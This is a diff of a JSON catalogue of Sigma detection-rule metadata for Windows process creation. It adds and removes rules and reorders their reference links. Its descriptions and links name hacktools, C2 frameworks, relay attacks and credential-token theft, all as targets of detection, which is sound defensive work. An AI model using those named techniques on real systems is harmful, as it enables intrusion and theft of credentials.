- "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET",
- "meta": {
- "author": "Florian Roth (Nextron Systems), oscd.community",
- "creation_date": "2020/07/30",
- "falsepositive": [
- "Legitimate setups that use similar flags"
- ],
- "filename": "proc_creation_win_apt_winnti_pipemon.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.welivesecurity.com/2020/05/21/no-game-over-winnti-group/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_winnti_pipemon.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1574.002",
- "attack.g0044"
- ]
- },
- "related": [
- {
- "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "73d70463-75c9-4258-92c6-17500fe972f2",
- "value": "Winnti Pipemon Characteristics"
- },
{
"description": "Detects suspicious powershell command line parameters used in Empire",
"meta": {
@@ -65335,8 +62643,8 @@
"logsource.product": "windows",
"refs": [
"https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64",
- "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191",
"https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178",
+ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191",
"https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml"
],
@@ -65403,9 +62711,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/",
"https://twitter.com/_felamos/status/1204705548668555264",
"https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/",
- "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dotnet.yml"
],
"tags": [
@@ -65459,6 +62767,39 @@
"uuid": "5687f942-867b-4578-ade7-1e341c46e99a",
"value": "VMToolsd Suspicious Child Process"
},
+ {
+ "description": "Detects potentially suspicious SQL queries using SQLCmd targeting the Veeam backup databases in order to steal information.",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2023/05/04",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_sqlcmd_veeam_db_recon.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://labs.withsecure.com/publications/fin7-target-veeam-servers",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_db_recon.yml"
+ ],
+ "tags": [
+ "attack.collection",
+ "attack.t1005"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "696bfb54-227e-4602-ac5b-30d9d2053312",
+ "value": "Veeam Backup Database Suspicious Query"
+ },
{
"description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.",
"meta": {
@@ -65472,8 +62813,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md",
"https://github.com/harleyQu1nn/AggressorScripts",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_software_discovery.yml"
],
"tags": [
@@ -65578,41 +62919,6 @@
"uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde",
"value": "Windows Shell/Scripting Processes Spawning Suspicious Programs"
},
- {
- "description": "Detects a specific export function name used by one of EquationGroup tools",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/03/04",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_apt_equationgroup_dll_u_load.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/cyb3rops/status/972186477512839170",
- "https://github.com/00derp/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_equationgroup_dll_u_load.yml"
- ],
- "tags": [
- "attack.g0020",
- "attack.defense_evasion",
- "attack.t1218.011"
- ]
- },
- "related": [
- {
- "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "d465d1d8-27a2-4cca-9621-a800f37cf72e",
- "value": "Equation Group DLL_U Export Function Load"
- },
{
"description": "Detects inline execution of PowerShell code from a file",
"meta": {
@@ -65718,8 +63024,8 @@
"logsource.product": "windows",
"refs": [
"https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules",
- "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/",
+ "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml"
],
@@ -65788,8 +63094,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
"https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens",
+ "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_teams_suspicious_command_line_cred_access.yml"
],
"tags": [
@@ -65898,8 +63204,8 @@
"logsource.product": "windows",
"refs": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/AccCheckConsole/",
- "https://twitter.com/bohops/status/1477717351017680899?s=12",
"https://gist.github.com/bohops/2444129419c8acf837aedda5f0e7f340",
+ "https://twitter.com/bohops/status/1477717351017680899?s=12",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml"
],
"tags": [
@@ -65922,9 +63228,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
"https://twitter.com/0gtweet/status/1564968845726580736",
"https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html",
+ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml"
],
"tags": [
@@ -65956,7 +63262,7 @@
{
"description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)",
"meta": {
- "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io",
+ "author": "Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io",
"creation_date": "2018/04/06",
"falsepositive": [
"Unknown"
@@ -65966,17 +63272,17 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A",
+ "https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html",
+ "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml",
"https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
"https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml",
- "https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/",
- "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
"https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set",
- "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml",
"https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100",
"https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml",
- "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A",
+ "https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/",
+ "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html",
"https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e",
- "https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_susp_child_processes.yml"
],
"tags": [
@@ -66027,10 +63333,10 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/cyb3rops/status/1186631731543236608",
"https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/",
"https://github.com/Neo23x0/DLLRunner",
"https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/",
+ "https://twitter.com/cyb3rops/status/1186631731543236608",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_by_ordinal.yml"
],
"tags": [
@@ -66130,9 +63436,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
"https://guides.lib.umich.edu/c.php?g=282942&p=1885348",
"https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
- "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_image.yml"
],
"tags": [
@@ -66199,10 +63505,10 @@
"logsource.product": "windows",
"refs": [
"https://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/",
- "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar",
- "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic",
"https://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/",
"https://nwgat.ninja/getting-system-information-with-wmic-on-windows/",
+ "https://github.com/redcanaryco/atomic-red-team/blob/a2ccd19c37d0278b4ffa8583add3cf52060a5418/atomics/T1082/T1082.md#atomic-test-25---system-information-discovery-with-wmic",
+ "https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_discovery.yml"
],
"tags": [
@@ -66291,8 +63597,8 @@
"logsource.product": "windows",
"refs": [
"https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings",
- "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
+ "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml"
],
"tags": [
@@ -66396,40 +63702,6 @@
"uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e",
"value": "LOLBIN Execution Of The FTP.EXE Binary"
},
- {
- "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/11/20",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_exploit_cve_2019_1388.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege",
- "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml"
- ],
- "tags": [
- "attack.privilege_escalation",
- "attack.t1068"
- ]
- },
- "related": [
- {
- "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c",
- "value": "Exploiting CVE-2019-1388"
- },
{
"description": "Detects different hacktools used for relay attacks on Windows for privilege escalation",
"meta": {
@@ -66444,11 +63716,11 @@
"logsource.product": "windows",
"refs": [
"https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/",
- "https://www.localpotato.com/",
"https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire",
- "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes",
- "https://pentestlab.blog/2017/04/13/hot-potato/",
"https://github.com/ohpe/juicy-potato",
+ "https://www.localpotato.com/",
+ "https://pentestlab.blog/2017/04/13/hot-potato/",
+ "https://hunter2.gitbook.io/darthsidious/other/war-stories/domain-admin-in-30-minutes",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_relay_attacks_tools.yml"
],
"tags": [
@@ -66468,74 +63740,6 @@
"uuid": "5589ab4f-a767-433c-961d-c91f3f704db1",
"value": "Potential SMB Relay Attack Tool Execution"
},
- {
- "description": "Detects the 3CXDesktopApp updater downloading a known compromised version of the 3CXDesktopApp software",
- "meta": {
- "author": "Nasreddine Bencherchali (Nextron Systems)",
- "creation_date": "2023/03/29",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_malware_3cx_compromise_susp_update.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.linkedin.com/feed/update/urn:li:activity:7047435754834198529/",
- "https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_3cx_compromise_susp_update.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1218",
- "attack.execution"
- ]
- },
- "related": [
- {
- "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "e7581747-1e44-4d4b-85a6-0db0b4a00f2a",
- "value": "Potential Compromised 3CXDesktopApp Update Activity"
- },
- {
- "description": "Detects suspicious inline VBScript keywords as used by UNC2452",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/03/05",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_apt_unc2452_vbscript_pattern.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_unc2452_vbscript_pattern.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.t1547.001"
- ]
- },
- "related": [
- {
- "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61",
- "value": "Suspicious VBScript UN2452 Pattern"
- },
{
"description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.",
"meta": {
@@ -66623,11 +63827,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/Alh4zr3d/status/1580925761996828672",
"https://twitter.com/0gtweet/status/1628720819537936386",
"https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/",
- "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
"https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html",
- "https://twitter.com/Alh4zr3d/status/1580925761996828672",
+ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_modification.yml"
],
"tags": [
@@ -66649,40 +63853,6 @@
"uuid": "98c5aeef-32d5-492f-b174-64a691896d25",
"value": "Service Security Descriptor Tampering Via Sc.EXE"
},
- {
- "description": "Detects potential QBot activity by looking for process executions used previously by QBot",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2019/10/01",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "proc_creation_win_malware_qbot.yml",
- "level": "critical",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/",
- "https://twitter.com/killamjr/status/1179034907932315648",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_qbot.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.005"
- ]
- },
- "related": [
- {
- "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "4fcac6eb-0287-4090-8eea-2602e4c20040",
- "value": "Potential QBot Activity"
- },
{
"description": "Detects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.",
"meta": {
@@ -66738,9 +63908,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
+ "https://twitter.com/gN3mes1s/status/1222095371175911424",
"https://twitter.com/gN3mes1s/status/1222088214581825540",
"https://twitter.com/gN3mes1s/status/1222095963789111296",
- "https://twitter.com/gN3mes1s/status/1222095371175911424",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_dctask64.yml"
],
"tags": [
@@ -66807,46 +63977,6 @@
"uuid": "37e8d358-6408-4853-82f4-98333fca7014",
"value": "Remote Access Tool - NetSupport Execution From Unusual Location"
},
- {
- "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community",
- "creation_date": "2017/11/10",
- "falsepositive": "No established falsepositives",
- "filename": "proc_creation_win_malware_adwind.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf",
- "https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_adwind.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1059.005",
- "attack.t1059.007"
- ]
- },
- "related": [
- {
- "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "1fac1481-2dbc-48b2-9096-753c49b4ec71",
- "value": "Adwind RAT / JRAT"
- },
{
"description": "Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism",
"meta": {
@@ -66860,11 +63990,11 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356",
- "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script",
"https://twitter.com/mattifestation/status/1326228491302563846",
- "http://blog.sevagas.com/?Hacking-around-HTA-files",
"https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997",
+ "https://docs.microsoft.com/en-us/dotnet/standard/data/xml/xslt-stylesheet-scripting-using-msxsl-script",
+ "http://blog.sevagas.com/?Hacking-around-HTA-files",
+ "https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_susp_execution.yml"
],
"tags": [
@@ -67007,8 +64137,8 @@
"logsource.product": "windows",
"refs": [
"https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41",
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
"https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115",
+ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_x509enrollment.yml"
],
"tags": "No established tags"
@@ -67062,8 +64192,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm",
"https://github.com/Hackplayers/evil-winrm",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_evil_winrm.yml"
],
"tags": [
@@ -67131,8 +64261,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md",
+ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml"
],
"tags": [
@@ -67198,8 +64328,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
"https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options",
+ "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powercfg_execution.yml"
],
"tags": [
@@ -67223,8 +64353,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md",
+ "https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_add.yml"
],
"tags": [
@@ -67257,9 +64387,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Runonce/",
"https://twitter.com/pabraeken/status/990717080805789697",
"https://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA",
+ "https://lolbas-project.github.io/lolbas/Binaries/Runonce/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_runonce_execution.yml"
],
"tags": [
@@ -67292,9 +64422,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/",
- "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets",
+ "https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/",
+ "https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encode.yml"
],
"tags": [
@@ -67393,9 +64523,9 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.poweradmin.com/paexec/",
- "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
"https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
+ "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec",
+ "https://www.poweradmin.com/paexec/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_psexec_remote_execution.yml"
],
"tags": [
@@ -67473,8 +64603,8 @@
"refs": [
"https://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/",
"https://twitter.com/gN3mes1s/status/1206874118282448897",
- "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"https://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/",
+ "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csc_susp_folder.yml"
],
"tags": [
@@ -67743,8 +64873,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
+ "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_screensaver.yml"
],
"tags": [
@@ -67995,8 +65125,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/byt3bl33d3r/CrackMapExec",
"https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242",
+ "https://github.com/byt3bl33d3r/CrackMapExec",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml"
],
"tags": [
@@ -68071,8 +65201,8 @@
"logsource.category": "process_creation",
"logsource.product": "windows",
"refs": [
- "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36",
"https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/",
+ "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sliver_c2_execution_pattern.yml"
],
"tags": [
